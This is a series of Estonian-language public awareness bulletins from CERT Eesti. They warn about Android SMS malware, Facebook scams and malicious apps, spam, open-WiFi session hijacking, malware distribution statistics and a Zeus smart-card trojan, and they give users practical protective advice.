CERT Eesti leidis sel nädalal nutitelefonides pahavara, mis ründas Eesti kasutajaid. Populaarse Androidi mängu nime all töötav pahavara saadab kasutaja teadmata tasulisi SMSe.

RIA infoturbe ekspert Tarmo Randeli sõnul on viimasel ajal on üha rohkem liikvel pahavara, mille sihtmärk on nutitelefonid. “Nutitelefonidest on hetkel kõige lihtsam rünnata Androidi platvormi, mille turvalahendus on kasutaja vaatevinklist vaadates pehmelt öeldes ebaõnnestunud.”

“Androidi tarkvaraga on kaks suurt muret. Esiteks, rakendust paigaldades küsitakse inimeselt raskesti mõistetavaid küsimusi, millest arusaamine on jõukohane pigem insenerile kui keskmisele nutitelefoni kasutajale. Teiseks ei kontrolli keegi kasutajateni jõudvate lahenduste kvaliteeti või turvalisust. Nii on Google Android Market väga hea võimalus pahavara levitamiseks.”

Üks võimalik stsenaarium:
Android Marketisse pannakse alla laadimiseks populaarse nimega mäng või taustapildi rakendus, antud juhul “Angry Birds FREE”. Kui kasutaja selle alla laeb, siis paigaldamise käigus küsib mäng õigust kirjutada mälukaardile ning kasutada internetti. Inimesed ei oska paha karta ja annavad mängule küsitud õigused. Nad ei tea, et jaatavalt vastamine annab rakendusele õiguse kirjutada mälukaardile internetist laetud lisaprogrammi ja see käima panna. Tavaliselt teeb seda pahavara, näiteks “Angry Birds FREE”, mille levitaja on Logastrod, mitte mängu ametlik omanik Rovio.

Probleemid:
- Tehniliste otsuste tegemist ei saa jätta lõpptarbijale. Esiteks ei ole võimalik õpetada kõiki kasutajaid aru saama inseneride loodud küsimustest. Teiseks, pahavara loojad suudavad trikitada kasutajat pahavarale jah-sõna andma.
Näiteks küsitakse keset mängu luba saata üks SMS kasutaja superkõrge punktiskooriga kuskile portaali, millele inimesed vastavad reeglina jaatavalt. SMSi hinda (3,5 EUR) ei pruugita mainida, või siis viidatakse kasutustingimustele.
- Kasutajad ei loe lehekülgede pikkusi kasutustingimusi.
- Androidi rakenduste turule saab igaüks laadida oma rakenduse. Keegi ei kontrolli, mida rakendus tegelikult teeb.

Mida saab teha:
- Kasutaja saab valida, kas ta lubab rakendusel midagi teha. Seni nõuavad pea kõik ründed kasutaja lubavat liigutust. Oluline on mõelda, kas mängul või taustapildil on ikka vaja ligipääsu minu kontaktidele või SMSidele?
- Antud juhul saadeti SMS tasulisele numbrile 17013. Teenusepakkujad saavad piirata enda võrkudes pettusega raha teenivaid sisuteenuste pakkujaid.

Veel samal teemal:
http://www.f-secure.com/weblog/archives/00002280.html
http://www.droidgamers.com/index.php/game-news/android-game-news/2777-psa-beware-of-logastrod-and-their-cloned-games-they-contain-malware

CERT Eesti (Computer Emeregency Response Team) on RIA osakond, mis tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemisega ja kasutajate turvateadlikkuse tõstmisega.

Kui vanasti pidi lapsevanem enne lapse kooli saatmist kontrollima, kas krihvel, tahvel ja hanesuled on olemas, siis nüüd ei saa läbi tarkade elektrooniliste seadmeteta. Igal aastal toob septembrikuu kaasa arvutiviirustesse nakatumise laine, kuna lapsed ja lapsevanemad on taas arvutite taga ja suvega on ohutus meelest läinud.

CERT Eesti infoturbe ekspert Triin Nigul: „Just enne kooliaasta algust on paras hetk järgmise põlvkonnaga arvutikasutuse reeglid kokku leppida ja mobiilikasutuse limiidid paika panna. Lapse ja vanema suhte vundamendi moodustab usaldus, selle eeldus on aga igapäevane vahetu suhtlus. Seetõttu on mõistlik, et laps kasutab arvutit elutoas.“

Õppeedukust võib liigne virtuaalelu teadagi segama hakata, seega ei saa kuidagi ilma arvutikasutuse ajaliste piirideta. Ka silmaarstid soovitavad, et kolmveerandtunnile arvuti taga peaks järgnema viisteist minutit puhkust. Kui kokkulepped ei toimi, võib abi otsida tarkvarast, mis arvuti õigel ajal kasutuskõlbmatuks muudab, kuid see ei takista nutikatel teismelistel sobivat alternatiivi leidmast. Arvuti sõbra juures või internetikohvikus on paraku vanema vaateulatusest sootuks väljas.

Kui aeg ja ruum paigas, tuleb lapsega vestelda kõige olulisemast – arvutikasutuse sisulisest poolest. Koolipsühholoogid tunnistavad, et kiusamine on tänavatelt internetti kolimas, lastekaitsjad omakorda hoiatavad küber-kommionude eest. Lapsel peab olema selge, et oma nime ja kodust aadressi igaühele ei jagata ning võõrastega kohtuma ei minda. Turvalise lapse ja vanema suhte korral räägib laps igast kahtlustäratavast pöördumisest. Selleks on vaja, et laps oskaks iseseisvalt veebisuhtlust hinnata ja ebaharilikku märgata.

Üha enam jõuavad laste taskutesse nutitelefonid, mille tehnilised võimalused interneti kasutamiseks on samasugused kui juhtme ja kuvariga arvutikastil. Sageli tuleb nutitelefonides interneti kasutamise eest maksta aga mahupõhist hinda. Seega tuleks hoolega üle vaadata lapse telefoni seaded, et see omapäi kallist teenust tarbima ei hakkaks.

Viirusetõrje ja tulemüüri olemasolu arvutis on praegusel ajal juba nii elementaarne, et seda tihti ei mainitagi. Lapse arvutisse on kaitsetarkvara väga vaja, sest sarnaselt kirevate kommidega poeriiulis meeldivad lastele kutsuvalt vilkuvad värvilised reklaamid arvutis. Iga ettevaatamatu klikk saab kahjuks kaasa tuua mitu teada (ja veel täiesti tundmatutki) viirust, mis salajast infot varastavad ja arvuti näiteks spämmirobotiks muudavad. Pahavarast lahtisaamine võib hiljem parasjagu keeruliseks osutuda või nõuda lausa arvutispetsialisti kulukat abi.

Last arvutist eemal hoida pole tänapäeval võimalik ega mõistlikki. Lapsevanematel on arvutialases kasvatustöös äärmiselt oluline roll – tutvustada noortele harivat ja silmaringi avardavat teavet, rääkides samal ajal ka interneti varjukülgedest.

Turvalist uut kooliaastat soovides
CERT Eesti

CERT Eesti (Computer Emeregency Response Team) on RIA osakond, mis tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemisega ja kasutajate turvateadlikkuse tõstmisega.

Esmakordselt on Eestis tekkinud olukord, kus mobiilse andmeside paketid on odavamad kui kodune neti püsiühendus ning kampaaniate käigus jagatakse nutitelefone pea tasuta. Kuna sellel suvel rändab mööda Eestit rekordiline arv nutitelefone, siis tasub meelde tuletada mõningaid taskusse mahtuvate arvutitega seotud pisiasju.

Nutitelefon on pisike, teda on mugav kaasa võtta, ent teda on ka lihtne kaotada või varastada. Et Sinu elu telefoni leidja või kurikaela ees valla poleks, varusta telefon ekraani avamiskoodiga, mida küsitakse iga kord telefoni kasutama asudes. Koodiks võib olla näpuga ekraanil veetav kujund, parem on aga kasutada numbrilist turvakoodi.

Varguse või kaotamise korral kaovad lisaks telefonile ka temas olnud andmed. Seega, sünkroniseeri oma telefoni andmeid regulaarselt “pilvega” või tee andmetest varukoopiaid. Telefoni kadumise korral ära unusta vahetada telefoniga ühendatud säutsumise, blogimise ja e-posti kontode paroole.

Nii nutitelefoni kui sülearvutit kasutades on mõistlik enda sotsiaalvõrgustike kontod ümber seadistada nii, et nad kasutavad turvalist veebilehitsemist. See muudab konto üle võtmise keerulisemaks, lisaks on konto seadistamine väga lihtne:

- Facebooki puhul vali: Konto > Konto seaded. Seaded lehelt otsi Konto turvalisust, millele klõpsates saad märkida linnukese “Turvaline sirvimine (https)” taha. Edaspidi kasutab suhtlusvõrgustik alati turvalist protokolli.
- Gmaili puhul on tee turvalise ühenduseni selline: Seaded > Üldine > Brauseri ühendus > Kasuta alati https-i.
- Microsoft Live keskkonnas: Konto > Ühendus HTTPS-i kaudu > Kasuta HTTPS-i automaatselt.
- Twitteris: Settings > Account ning märgi linnuke “Always use HTTPS” ette. Salvesta.

Kui Sa pole oma kontosid üle võtmise vastu kaitsnud, võib keegi sobrada Sinu postkastis või postitada sõnumeid Sinu Facebooki seinale. Telefonis olevatele kontodele lihtsalt ligi pääsedes lood võimaluse varastada Sinu digitaalne identiteet ning kurikaelad saavad ülevõetud kontosid kasutada raha väljapetmiseks Sinu tuttavatelt. On juhtumeid kus ülevõetud Facebooki konto kaudu väidetakse, et inimene on väljamaal hätta jäänud ja küsitakse sõpradelt raha.

Võimaluse korral väldi avaliku parooliga kaitsmata WiFi kasutamist. Ilma paroolita võrk on kergelt pealtkuulatav ja sageli on andmed nutitelefonis vähem kaitstud, kui arvutites. Näiteks kasutatakse palju paroolide veebilehitsejas salvetamist, kuna nutitelefoni väikeselt ekraanilt on neid ebamugav iga kord sisse toksida.

Nutitelefon on kiire elutempoga maailmas väga hea abimees. Teda Sinu jaoks atraktiivseks muutvad omadused on sama ligitõmbavad ka inimestele, kes sooviksid sellest kuritegelikult kasu saada, sestap kasuta enda andmete jagamisel kainet mõistust. Lisaks telefoni tehnilisele kaitsmisele tuleb tähelepanelik olla ka ise pilte ja andmeid üles laadides. Kui inimesed ise jagavad infot, millal on maja tühi, ei pea kurjategijad selle info otsimisega vaeva nägemagi.

Turvalist suve soovides,
Tarmo Randel
CERT-EE infoturbe ekspert

CERT Eesti (Computer Emeregency Response Team) tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemisega ja kasutajate turvateadlikkuse tõstmisega.

Täna tekkis Facebookis uus kuritegelik skeem, kus üle võetud kontode kaudu küsitakse tuhapilve lõksust välja pääsemiseks raha.

CERT Eesti juht Hillar Aarelaid: „Skeem on lihtne, kurjategijad võtavad inimese Facebooki konto üle ning postitavad seinale abipalve. Sõnumi sisu tundub tõene - inimene on tuhapilve tõttu lõksus ning vajab kiiresti koju saamiseks raha. Kui teile saabub sõbralt Facebookis selline teade, siis on suure tõenäosusega tegu pettusega. Helistage palun oma tuttavale, et info üle kontrollida ja teada anda, et tema sotsiaalvõrgustiku konto on üle võetud.“

Kuritegevus internetis on sageli hooajalise iseloomuga ja raha välja petmiseks või viiruste levitamiseks kasutatakse iga võimalust. Valentinipäeva paiku saadetakse nakatunud õnnitluskaarte, olümpia ajal nakatunud linkidega uudiseid sportlaste võidust. Tuhapilv puudutab paljusid inimesi ja on selle tõttu hea võimalus kiireteks petuskeemideks. CERT Eesti palub iga rahapalvega teatesse suhtuda ettevaatusega ja võimalusel püüda väidetavalt hätta sattunud inimesega isiklikult kontakti võtta.

Kui inimene on tõesti välisriigis lõksus ning vajab koju sõitmiseks abi, saab helistada Välisministeeriumi konsulaarabi numbril +372 53 01 9999

CERT Eesti (Computer Emeregency Response Team) tegeleb Eesti arvutivõrkudes toimuvate turvaintsidentide käsitlemisega ja kasutajate turvateadlikkuse tõstmisega.

Täna õhtul linastuvas hariduslikus teleseriaalis „IT-planeet“ jõuavad peategelased rämspostis lubatud aarde jahil Nigeeriasse. Millistesse seiklustesse nad rämpskirja uskudes satuvad, saab näha kell 21.00 kanalist TV3. Tegelikkuses teenivad suuri summasid hoopis kurjategijad, kes korraldavad spämmi saatmist tuhandetele inimestele.

CERT Eesti infoturbe ekspert Tarmo Randeli sõnul saabuvad soovimatud e-kirjad inimeste postkastidesse ühe eesmärgiga – teenida kellelegi raha. „Raha teenija ei ole loomulikult kirja saaja, kuigi kirjades vahest vastupidist väidetakse. Uuringute järgi teenivad kurjategijad veebist üles korjatud aadresside kuritarvitamisega tuhandeid eurosid.“

Rämpspostiga üritatakse levitada pahavara – see on kuritegelikus maailmas pakutav tasuline teenus. Kui veel mõned aastad tagasi pandi arvutiviirus kirjaga kaasa, siis tänasel päeval nakatatakse peamiselt kirja sees olevate veebilinkide kaudu, millele klikkides pahavara arvutisse ronib.

Omaette valdkonna moodustavad nn Nigeeria petukirjad, milles lubatakse kirja saajale lotovõidu või päranduse kaudu kosmilisi summasid. Tavaliselt tuleb enne suure summa kättesaamist siiski lotovõidu või päranduse saajal teha mõned vormistamiseks vajalikud maksed. Lotovõit või pärandus jääb loomulikult saamata. Ära usu ka kodus lihtsat teenimisvõimalust pakkuvaid e-kirju – tegemist on pettusega, milles osalemisel tuleb Sul suure tõenäosusega tegemist teha politseiga.

„IT-planeedi“ tänases osas läheb Nigeeriast päranduse saanud tulnukatel oluliselt õnnelikumalt kui inimestel tavaliselt. Kuna Sina pole tulnukas, siis saad mõningaid reegleid järgides vältida postkasti jõudvat rämpsu:
*ära sisesta oma põhilist e-posti aadressi avalikele veebilehtedele. Tee selleks ajutine e-posti aadress;
*ära kliki e-kirjas olevaid linke. Soovitus kehtib ka siis, kui kirja saatja tundub olevat Sulle tuttav, aga lingi sisust ei saa hästi aru;
*suhtu ettevaatusega kirjadesse, milles palutakse mõne konto parooli uuendada või küsitakse kontoga seotud andmeid;
*mõtle loogiliselt. Viagrat müüakse apteegis, 10-euroseid Rolexeid pole olemas. Lotovõiduks pead ostma pileti ja Hong-Kongis elavast pururikkast vanavanaisast oleksid Sa kindlasti kuulnud oma sugulastelt.

International Computer Science Institute uuris spämmi saatva robotvõrgu tegutsemist 26 päeva jooksul. Üle võetud arvutid üritasid selle aja jooksul saata võlts-Viagrat ostma meelitavaid kirju umbes 350 miljonile e-posti aadressile. Uuringut „Spamalytics: An Empirical Analysis of Spam Marketing Conversion“ saab lugeda siit.

IT-teemalise teleseriaali tootis Riigi Infosüsteemide Arenduskeskuse tellimusel Nafta. Seriaali rahastab Euroopa Liidu struktuurifondide programm “Infoühiskonna teadlikkuse tõstmine”. Pilte tulnukate tegemistest ja arvutialast nõu jagab tulnukalaeva Facebooki leht: http://www.facebook.com/itplaneet

Sisenedes oranzh-musta “WiFi” kleebisega tähistatud kohvikusse leiab tavaliselt üsna mitu inimest sülearvutitega oma igapäevaseid toimetusi tegemas. Eesti arvutikasutajad võtavad tasuta paroolita WiFi-t avalikes kohtades kui iseenesestmõistetavat lisa enda kohvitassi kõrvale. Tavaliselt aga ei teata, et parooliga kaitsmata WiFit kasutades on kohvikukülastajal võimalus saada rohkem või vähem pahatahtlike rünnakute ohvriks, mis halvemal juhul võivad lõppeda sotsiaalvõrgustike või e-posti kontode üle võtmisega.

Mis osas erineb siis avalik kohviku WiFi kodusest parooliga kaitstust? Nii mõneski mõttes on arvuti suhtlus traadita võrgus sarnane meie igapäevaelulise suhtlusega – kui koduseinte vahel räägitud jutt jääb vaid kõnelejate vahele, siis kohvikulaua taga peetud vestlusest on võimalik osa saada ka kõrvallaudades istujatel. Sarnaselt on parooliga kaitsmata WiFit võimalik pealt kuulata ilma suurema vaevata. Lisaks kuulamisele on igaühel võimalik netist alla laadida töövahendeid, millega kerge vaevaga üle võtta näiteks Sinu Facebooki konto, osaleda Sinu MSNi vestluses või lugeda läbi Sinu e-kirjad. Ebameeldivaid üllatusi saad avalikku parooliga kaitsmata WiFit kasutades vältida paari lihtsa nipiga.

Esiteks seadista Sulle olulised veebikeskkonnad kasutama turvalist HTTPS protokolli. Tavaliselt toimub veebilehitseja ja veebiserveri vaheline suhtlus nn avatud tekstiga (HTTP), mis parooliga kaitsmata WiFis on kergelt pealtkuulatav. HTTPSi puhul on suhtlus lehitseja ja serveri vahel muudetud matemaatiliste meetoditega salajaseks.

HTTPSi kasutamise saad seadistada enamlevinud keskkondades - näiteks Facebookis ja Gmailis. Facebooki puhul vali Konto > Konto seaded. Seaded lehelt otsi Konto turvalisust, millele klõpsates saad märkida linnukese “Turvaline sirvimine (https)” taha. Edaspidi kasutab uhtlusvõrgustik alati turvalist protokolli. Gmaili puhul on tee turvalise ühenduseni selline: Seaded > Üldine > Brauseri ühendus > Kasuta alati https-i. Microsoft Live keskkonnas: Konto > Ühendus HTTPS-i kaudu > Kasuta HTTPS-i automaatselt.
Ära kunagi sisesta oma isiku või rahaliste vahenditega seotud andmeid (pärisnimi, isikukood, krediitkaardi andmed) avalikus WiFis olles veebilehtedele, mis ei kasuta HTTPSi.

Teiseks kasuta alati turvatarkvara ja tulemüüri ning lülita välja arvuti ressursside jagamine. Uuemad Windows operatsioonisüsteemid paluvad uue WiFi-võrguga ühendudes valida nn ühenduse turvaprofiil, millegasätitakse paika ka arvuti turvaseaded. Vanematel tuleb kontrollpaneelilt üles leida võrgu ja jagamise seaded ning sealt lõpetada kõigi printerite ja kaustade jagamine. Mac OS Xi puhul tuleb System Preferences > Sharing korjata linnukesed ära kõigi alajaotuses olevate teenuste eest.

Kolmandaks – kasuta erinevaid salasõnu. Kui kasutad ühte kasutajanime ja salasõna kõigis keskkondades, saab kurikael pihtapandud kasutajanime ja parooliga üle võtta Sinu kontod ka teistes keskkondades.

Neja kõige lihtsam soovitus - lülita WiFi välja, kui Sa seda ei kasuta.

E-Eesti rubriik alustab maailma pahavara levituskohtade statistika avaldamisega. Tegemist on CERT Eesti (Computer Emergency Response Team) mitteametlike numbritega, mis näitavad pigem trende ja suhtarve, mitte absoluutset pahavara levituskohtade arvu. Nakkust levitavate kohtade tegeliku arvu on määratelda väga keeruline ja kindlasti on see arv sadu kordi suurem.

Nakatumine näeb üldjuhul välja järgnevalt: kurjategijad istutavad paha skripti ülevõetud veebilehele. Selleks võib olla nii suur meediaväljaanne, mõni kohaliku omavalitsuse portaal kui mõne väikeettevõtte koduleht. Kuna kurjategijate eesmärk on võimalikult suur sihtgrupp, siis kurje skripte külvatakse võimalikult paljudele ülevõetud veebilehtedele. Säherduse vaenuliku skriptiga lehekülge nimetatakse nakatamiskohaks.

Kui inimene satub internetis ringi kammides nakatamiskohta, suunatakse ta sealt edasi pahavara levitamiskohta. Edasisuunamine võib olla vajalik seetõttu, et nakatumiskohas pole pahasoovijail tegutsemiseks piisavalt õigusi. Samuti aitab see peita kurjategijatel oma tegutsemise jälgi. Üks levitamiskoht võib nakatada väga suure hulga kasutajaid, kelle arvu täpne väljaselgitamine on keeruline. Üks internetirünnak koosneb suuremal osal juhtudest siis kolmest sammust: 1. kasutaja arvuti, 2. nakatumiskoht ja 3. levitamiskoht. Kui viirus on edukalt kasutaja arvutis, hakatakse seda omakorda kasutama pahvara levitamiseks või kasutaja andmete varastamiseks.

Pahavara levituskohta võib pidada pahatahtliku serveripidaja juures, kes keeldub koostööst viirust eemaldada soovivate organisatsioonidega. On võimalik, et levituskoht asub rünnatavatest väga erinevas ajavööndis või teenusepakkuja juures või siis reageerib teadetele töökoormuse tõttu aeglaselt.

Maailma nakatumiskohtade arv 14. - 20. veebruar. Sulgudes on esitatud võrdluseks veebruarikuu teise nädala andmed.

Esmaspäev: 1310 (1744)
Teisipäev: 1640 (1594)
Kolmapäev: 1148 (1293)
Neljapäev: 785 (1284)
Reede: 325 (755)
Laupäev: 908 (945)
Pühapäev: 629 (1124)

Nakatumiskohtade edetabel riikide kaupa, mis ei näita mingilgi kombel konkreetse riigi pahatahtlikust. Sulgudes on 7. - 13. veebruari andmed.

USA: 2921 (3804)
Hiina: 1298 (1143)
Läti: 455 (74)
Lõuna_Korea: 326 (531)
Brasiilia: 220 (333)
Hispaania: 211 (227)
Venemaa: 197 (268)
Kanada: 178 (281)
Saksamaa: 158 (238)
Ukraina: 139 (610)

Osalt on pahavara levituskohtade arv seotud interneti levikuga riigis ja arvutite kasutamise ajalooga – mida rohkem kasutatakse internetti, seda rohkem on ka pahalastel võimalus seda kasutada. Erinevad on riikide seadusedki. Vabama ettevõtluskeskkonnaga riikides (näiteks USA) on paratamatult lihtsam majutada ka kurivara levitavaid lehekülgi. Teisalt on riikide traditsioonid ja suhtumine erinevad ning küberturvalisusele lihtsalt ei pöörata tähelepanu (näiteks Hiina).

Alates 1. veebruarist alustab Elion koostöös CERT Eestiga ennetava arvutikaitse projektiga. Selle eesmärk on teavitada Elioni kliente võimalikest turvaohtudest ja vähendada sellega oluliselt arvutiviiruste ja pahavara levikut Eesti internetiruumis.

Infoturbega tegelevate inimeste igapäevatöös ei ole enam üllatus, et kasutajad ei saa arvuti nakatumisest pahavaraga teada, kuigi arvutil on korralik tulemüür ja viirusetõrje. Põhjus peitub selles, et pahavara loojad on teinud märkimisväärseid pingutusi pahavara märkamatuks tegutsemiseks. Aeg-ajalt on see neil ka õnnestunud.

Ennetava arvutikaitse (ingl Walled Garden) eesmärk on suurema õnnetuse ärahoidmine juhtumitel, kui inimene ei oska kahtlustada, et tema arvutisse on kurivara (näiteks pangatroojalane) salaja sisse pugenud. Sellisel puhul antakse arvutikasutajatele sõbralikul viisil teada, et tema arvuti vajab ülevaatust, kuna arvutis võib peituda pahatahtlik viirus. Tavaliselt antakse kasutajale sellest teada suunamisega veebilehele, mis sisaldab infot:
-Miks kasutaja sellele veebilehele sattus?
-Mis on võimalikud ohud, kui ta peaks valima hoiatuse ignoreerimise?
-Mida ta peaks tegema, et arvutisse sattunud pahalasest vabaneda?

Kui esimene kaitseliin – antiviirus – ei “pea vastu” ning arvuti nakatub pahavaraga, ei saa kasutaja sellest tavalisest aru. Arvutisse jõudnud kavalamad viirused teevad esmalt kahjutuks tülikad vastased, antiviiruse programmid ja tulemüüri. Selliste viiruste eesmärk on vaikselt arvutis toimetada, varastades oma “peremehele” seal olevat infot, mida saab sobilike asjaolude kokkulangemisel rahaks teha. Teenimiseks võib pahavara saata välja rämpsposti, osaleda küberründes või internetipanka külastava inimese kontolt raha näpata.

Selleks, et ära hoida kasutaja sattumine küberkriminaali tegevuse ohvriks, on loodud ennetava arvutikaitse lahendus. See annab pahaaimamatule kasutajale teada, et tema arvutisse on sisse murtud ning edasisel arvutikasutamisel võib ta kuriteo ohvriks sattuda. Maailmas tehtud samalaadsete lahenduste kogemuse põhjal on teavitamise viisiks valitud kasutaja suunamine informatiivsele veebilehele.

Kuidas toimib ennetava arvutikaitse tehniline lahendus?

Ennetav arvutikaitse toimib tänu sellele, et enimlevinud arvutiviirused käituvad sarnaselt. Peale arvuti nakatamist võtab arvutiviiruse programm ühendust nn kontrollikeskusega, mille kaudu küberkriminaal saab kontrollida pahavara tegevust. Kontrollikeskus on tavaline internetti ühendatud serverarvuti.

Kontrollkeskuse kaudu juhitakse pahavara tegevusi:
-arvutiviiruse programmiuuenduste allalaadimist;
-varastatud info toimetamist arvutist küberkriminaalile;
-töökäskude täitmist, näiteks teadete postitamine kasutaja Facebooki “seinale”.

Infoturbega tegelevad organisatsioonid avastavad oma tavapärase tegevuse käigus iga päev sadu kontrollikeskusi. CERT Eesti kogub töö käigus avastatud kontrollikeskuste nimekirjad kokku ning edastab info interneti teenusepakkujale. Lisaks kontrollib CERT nimekirja sattunud servereid, sest aeg-ajalt võib nimistusse sattuda ka täiesti tavalisi s.t “häid” servereid.

Kui klient pöördub mõne teadaoleva kontrollkeskuse poole, siis on teenusepakkujal võimalik küllaltki usaldusväärselt öelda, et tegemist on pahavara nakkusega kliendi arvutis.

Kindlasti teevad nimekirja koostamisel väiksemaid vigu välismaised infoturbeorganisatsioonid ning on võimalik, et nimekirja kontrollimisel teeb apsaka ka CERT-EE. Nimekirja usaldusväärsus on kindlasti 100% lähedal, kuid ei saa välistada võimalust, et just Sinu arvuti pöördus "hea" serveri poole, mis oli ekslikult nimekirja sattunud.

Oled saanud ennetava arvutikaitse teavituse, aga arvutis olev antiviirus ei leia midagi?

1. Viirus on antiviirusprogrammi (AV) muutnud “hambutuks” - installeeri uus antiviirus usaldusväärsest allikast.
2. Väga värskeid viirusi ei pruugi viirusetõrje programmid tunda - oota päevakene, võid proovida teisi antiviirusi.
3. AV ei oskagi leida kõiki maailmas olevaid arvutiviirusi – proovi teisi antiviiruse tooteid.
4. AV on tegelikult võlts antiviirus – võlts antiviirus ei tõrju viiruseid. Kasuta tuntud tooteid.
5. Kui kodune internetiühendus on jagatud naabritega, siis palu kõik naabrite arvutid üle kontrollida.
6. Kui kodune WiFi on paroolita, siis võis suvaline nakatunud arvuti koduvõrgus käia. Pane enda WiFile korralik parool.
7. Kas ma saaksin nimekirja võrguaadressidest, mille külastamine käivitab ennetava arvutikaitse? -  Kahjuks on vastus hetkel "ei". Põhjus on sama, miks me ei jaga elanikkonnale uusimaid arvutiviirusi või miks inimesi ei teavitata mürkmadude täpsest asukohast. Me mõistame, et lisaks ametiasutustele ja firmadele võib interneti parendamise soov tekkida ka asjaarmastajatel, kuid hetkel alles kestavad spetsialistide arutelud, kuidas seda ohutult võimaldada.

Kui ülaltoodud võtted ei aita, siis leia endale IT-teadlik abiline, kes on selliste probleemidega varem kokku puutunud.

Aasta viimase teavituse tahaks kirjutada positiivses võtmes, ent kurikaelad ei ole koostööaltid. Nii tulebki jõulueelne teade pühendada pahavara levitamisele Facebooki kaudu.

CERT Eesti infoturbe ekspert Tarmo Randeli sõnul on e-kirjade ja välksõnumite teel pahavara levitamine endiselt populaarne. „Uue vahendina on küberpätid kasutusele võtnud populaarse suhtluskeskkonna Facebook, mille pahavara luuakse eesmärgiga Sinu kontaktid pihta panna ja konto andmed varastada. Seda on kurikaeltel vaja, et enda pahavara võimalikult laiade rahvahulkade seas levitada. Kuidas kontolt kogutud andmeid kasutada, sõltub juba rakenduse loojate fantaasiast ja võimalustest.“

Facebooki pahavara ilmutab end hetkel Sinu sõbra teatena, mis on ingliskeelne, šokeeriva sisuga ning varustatud tähelepanu tõmbava pildiga. Novembrikuus algas pahavara levitatav teade sõnumiga „OMG!“ ning sisu oli teade noore tüdruku surmast. Detsembrikuine spämmilaine edastab samuti noore tüdruku surmateadet.

Teade suunab Su Facebooki rakenduse lehele, kus lisainfo saamiseks peab klikkima nupule. Tegelikult klikkides mingit lisainfot ei saa, vaid Sind suunatakse rakenduse paigaldamise lehele. See on väga tähtis hetk – paigaldamise lehel küsib rakendus luba saada ligi Sinu kontole: ära sellele rakendusele seda luba anna! Kui siiski oled pahavarale andnud loa konto andmeid kasutada, siis postitab kuritahtlik rakendus Su seinale sarnase kutsuva sõnumi ja varastab Sinu kontolt andmeid.

Ekraanipilt rakendusest:

Facebooki kasutajana saad pahavarast hoiduda, selleks:
-mõtle enne sõnumile klikkimist, kas Sinu sõber ikka tavaliselt postitab selliseid sõnumeid oma „seinale“;
-kui sõnum viib Sind rakenduste lehele (aadressi alguses on apps.facebook.com), siis suhtu ekraanil olevatesse juhenditesse ettevaatusega;
-ole ettevaatlik, kui mõni rakendus tahab saada luba postitada Sinu Facebooki „seinale“ (Post to my Wall) ja hallata sinu konto lehti (Manage my Pages);
-kui oled leidnud kahtlase postituse oma sõbra Facebooki „seinalt“, anna talle sellest teada;
-juba paigaldatud pahavara eemaldamine on kirjeldatud siin.

Facebooki pahavara levik on ilmutanud mitmeid uusi probleeme arvutiturbega tegelevatele inimestele. Esiteks on raske teada saada, mida pahavara loojad tegelikult kasutaja konto ja andmetega teevad. Tavalisest arvutiviirusest erineb Facebooki viirus selles osas, et kasutaja arvutisse viirus ei jõua. Tavapärase s.o. arvutisse paigaldatud viiruse uurimine võimaldab peale mõningast vaevanägemist teada saada, mida pahavara teeb. Facebooki puhul paikneb pahavara ühe ettevõtte serverites, millele arvutiviiruste analüüsijatel ei ole ligipääsu. Samuti puudub hetkel Facebooki rakenduste üle korralik kontroll – igaüks võib kirjutada rakenduse. Puudub toimiv mehhanism, et uued rakendused vaadatakse kriitilise pilguga üle enne levikusse lubamist.

Lumine jõulutervitus CERTi kontorist, mis krõbedale külmale vaatamata spämmi tõrjuvate serverite abil soojaks köetud!

Sinu CERT-EE

CERT Eesti ülevaated viimase aja küberpahalaste pingutustest internetis on mõeldud IT-huvilistele, kes igapäevaselt end andmeturbesse puutuvaga kursis ei pea hoidma. Kõik teated on saadaval www.ria.ee/turvamelu.

Arvutiturbefirma „ESET“ Venemaal paikneva turvalabori eksperdid avaldasid novembri alguses ülevaate pangatroojalase Zeus kohta. Tehnilise maiguga kirjutises viidati Zeusi variandile, mis ründas Venemaal tegutsevat panka, kasutades selleks Windowsi standardset lahendust kiipkaardiga suhtlemiseks.

Ründe tehnilisest kirjeldusest on meie jaoks oluline info, et kiipkaardid on muutunud väga populaarseks. Lisaks tavalistele trikkidele on pahavara arendajad hakanud end kurssi viima sellega, kuidas kiipkaarte kasutavatelt klientidelt raha kätte saada. Tegemist ei ole üllatusega – oleme oodanud sellelaadset kiipkaartide kuritarvituse katset paar viimast aastat.

CERT Eesti (Computer Emergency Response Team) infoturbe ekspert Tarmo Randeli sõnul on kiipkaarte kasutavad lahendused üksteisest veidi erinevad ja tänu sellele ei oska Venemaal avastatud pahalane Eesti ID-kaarti ära kasutada. „Küll aga on hetkel suurepärane võimalus meelde tuletada, et turvalisus ei ole püsiv seisund, vaid pidev protsess. Selle protsessi kõige olulisem lüli on kasutaja, kes saab ennast ise kaitsta. ID-kaart tuleb lugejasse panna vaid selleks ajaks, kui teda reaalselt vaja on. Erandi võib teha, kui ID-kaart peab pidevalt olema töökoha arvutis – siis hoolitseb juba tööandja selle eest, et asutuse arvutid oleksid viirustest vabad ning ID-kaardi kasutamine turvaline.“

ESETi turvalabori ekspertide ülevaate aluseks on reaalne juhtum, mis jõudis ka kohtusse. Väga hea on see, et sellisel moel raha varastavad kurjategijad saadakse kätte ja nad lähevad vangi. Seda sõltumata sellest, kus riigis kurjategija asub – olgu selleks siis Eesti, Suurbritannia või Venemaa.

Pangatroojalastele lisaks on tormine sügis murdnud maha ka hulgaliselt tarkvara ning tormine meri uhtunud rannale paar huvitavat töövahendit. Need kinnitavad viimase aja hõikeid – meie igapäevaelu ja arvutiturvalisus on tegemas läbi radikaalseid muutusi. Ajakohase töövahendina mainime sedapuhku Firesheep'i. See programm võimaldab avalikus internetipunktis paari hiireklikiga üle võtta teiste netikasutajate Facebook'i ja Twitteri kontosid ilma „häkkimisoskusi“ omamata.

Avaliku traadita interneti kasutajatele paar soovitust:
*kasutage avalikus WiFi's neid internetiteenuseid, kus suhtlus on krüpteeritud – näiteks on turvalise veebilehe aadressirea alguses „https://“ (tavalise http:// asemel);
*Facebook ei ole nii elutähtis leht, et selle külastamisega ei saaks kannatada, kuni korralikult turvatud koduse WiFi-võrguni jõuad ...;
*nõudke oma teenusepakkujatelt (e-mail jne) teenuse muutmist turvaliselt kasutatavaks;
